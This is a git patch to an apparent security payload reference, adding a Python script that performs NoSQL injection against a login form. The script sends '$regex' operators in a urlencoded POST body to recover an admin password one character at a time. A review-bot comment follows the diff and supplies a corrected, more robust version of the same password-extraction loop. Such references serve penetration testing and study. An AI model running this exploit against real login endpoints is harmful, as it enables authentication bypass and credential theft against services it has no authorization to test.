From e0f851e6e9e561b8ce71cab67f726da1ca461ae1 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sun, 7 Nov 2021 17:49:50 +0100
Subject: [PATCH] NoSQLi: add POST with urlencoded body

---
 NoSQL Injection/README.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index cebfe1b..a37eb71 100644
--- a/NoSQL Injection/README.md
+++ b/NoSQL Injection/README.md
@@ -98,6 +98,30 @@ while True:
 password += c
 ```
 
+### POST with urlencoded body
+
+```python
+import requests
+import urllib3
+import string
+import urllib
+urllib3.disable_warnings()
+
+username="admin"
+password=""
+u="http://example.org/login"
+headers={'content-type': 'application/x-www-form-urlencoded'}
+
+while True:
+    for c in string.printable:
+        if c not in ['*','+','.','?','|','&','$']:
+            payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
+            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+            if r.status_code == 302 and r.headers['Location'] == '/dashboard':
+                print("Found one more char : %s" % (password+c))
+                password += c
+```
+
 ### GET
 
 ```python
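Review bot: The `payload` string built in the added loop is handed to `requests.post(data=...)` verbatim, so the `string.printable` characters the exclusion list does not cover (`%`, `=`, `#`, space and the `\t\n\r\x0b\x0c` whitespace) go out unencoded and either corrupt the `application/x-www-form-urlencoded` body or silently alter the `$regex` value, and the `import urllib` that would have fixed this is never used; passing a dict to `data=` lets requests escape every value. `r.headers['Location']` raises `KeyError` on any 302 that carries no `Location` header and aborts the extraction mid-run, whereas `r.headers.get('Location') == '/dashboard'` keeps the same check and survives it. The `while True` loop also has no exit condition: once the last character is recovered no candidate matches and the script keeps re-sending the whole alphabet forever, so track whether a pass found a character and stop when it did not. Regex metacharacters the list does not exclude (`(`, `[`, `{`, `\`, `^`) would presumably yield an invalid or never-matching pattern rather than a hit, so a password containing them is not recoverable by this loop; a one-line caveat in the README would save readers a confusing run.
```python
# … unchanged: imports, username/password/u/headers setup …
while True:
    found = False
    for c in string.printable:
        if c in ['*', '+', '.', '?', '|', '&', '$', '^', '(', ')', '[', ']', '{', '}', '\\']:
            continue
        # let requests urlencode the values so '%', '=', '#' and whitespace survive intact
        data = {'user': username, 'pass[$regex]': '^' + password + c, 'remember': 'on'}
        r = requests.post(u, data=data, headers=headers, verify=False, allow_redirects=False)
        if r.status_code == 302 and r.headers.get('Location') == '/dashboard':
            print("Found one more char : %s" % (password + c))
            password += c
            found = True
            break
    if not found:
        # no candidate extended the prefix: the password is complete (or contains an excluded char)
        break
print("Password: %s" % password)
```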